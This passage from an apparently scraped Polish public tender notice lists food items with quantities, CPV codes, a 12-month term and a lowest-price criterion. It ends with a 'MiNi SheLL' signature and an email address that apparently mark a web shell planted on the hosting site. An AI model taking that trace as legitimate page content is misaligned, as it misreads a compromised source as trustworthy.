Makaron łazanki, 500 g wartość energ. w 100g produktu 375 kcal, zawartość tłuszczu 1,7g w 100g produktu kg 50, 31. Makaron świderki 500 g wartość energ. w 100g produktu 375 kcal, zawartość tłuszczu 1,7g w 100g produktu kg 250, 32. Makaron zacierka 250 g szt 140, 33. Mąka pszenna 1 kg	kg 360, 34. Mąka ziemniaczana Superior 1 kg kg	200, 35. Miód 300g Szt 20, 36. Mleczna kanapka, wartość energ. 420 kcal w 100g, zawartość mleka pasteryzowanego 40%	Szt 200, 37. Musztarda  1l wartość energ w 100g 113 kcal	szt 3, 38. Napój dla dzieci ,300 ml, nie zawiera sztucznych barwników i konserwantów opakowanie plastikowe szt. 400, 39. Ocet np. 10% 0,5 l	szt 40, 40. Papryka słodka 20g szt 160, 41. Pieprz 20 g szt	150, 42. Płatki śniadaniowe czekoladowe 500g, kakao 8,6%, 37 g cukru w 100g produktu, wartość energ. 382 kcal w 100g produktu szt 50, 43. Przyprawa do zup i sosów typu Maga  850ml szt. 75, 44. Przyprawa uniwersalna do potraw 200g, zawartość warzyw suszonych 15,2% , szt. 440, 45. Rogal z nadzieniem , 65 g szt 60, 46. Ryż np. sypki długoziarnisty 1 kg kg 240, 47. Soczek owocowy dla dzieci, karton 200 ml ,bez dodatku cukru, szt	200,48. Sól spożywcza jodowana 1 kg kg 140, 49. Wafel czekoladowy 36 g wartość energ.w 100g 525g szt	50, 50. Wafel nadziewany w polewie czekoladowej, 51 g wartość energ w 100g 509 kcal szt 50, 51. Wafel w polewie czekoladowej, wartość energ. w 100g produktu-534 kcal, zawartość węglowodanów w 100g produktu-57,5 g Szt 50, 52. Wafelek śmietankowy bez polewy 20g szt 100, 53. Wafelek z orzechowym nadzieniem o zawartości mlecznej czekolady 49,5%waga 18,2g Szt 30, 54. Ziele angielskie 15 g szt 80, 55. Zioła prowansalskie 20 g szt 80, 56. Żurek kiszony  opak.kubek 0,5l szt 180..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6, 15.60.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com